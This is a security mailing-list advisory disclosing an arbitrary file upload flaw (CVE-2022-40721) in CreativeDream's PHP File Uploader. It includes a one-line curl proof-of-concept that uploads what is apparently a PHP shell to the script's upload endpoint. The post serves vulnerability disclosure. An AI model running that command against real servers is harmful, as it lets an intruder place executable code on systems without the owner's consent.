Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 3 Oct 2022 12:17:43 -0400
From: Larry Cashdollar <larry0@...com>
To: oss-security@...ts.openwall.com
Subject: CreativeDream software arbitrary file upload


Title: CreativeDream software arbitrary file upload
Author: Larry W. Cashdollar
Date: 2022-09-08
CVE-ID:[CVE-2022-40721]
Download Site: https://github.com/CreativeDream
Vendor: CreativeDream
Vendor Notified: 2020-02-19
Vendor Contact: yuliangagarin [at] mail.ru
References: https://github.com/CreativeDream/php-uploader/issues/23
Advisory: http://www.vapidlabs.com/advisory.php?v=216
Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.
Vulnerability:
The software allows executable file uploads to the web root directory.
Export: JSON TEXT XML
Exploit Code:
	• curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@...ll.php"

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.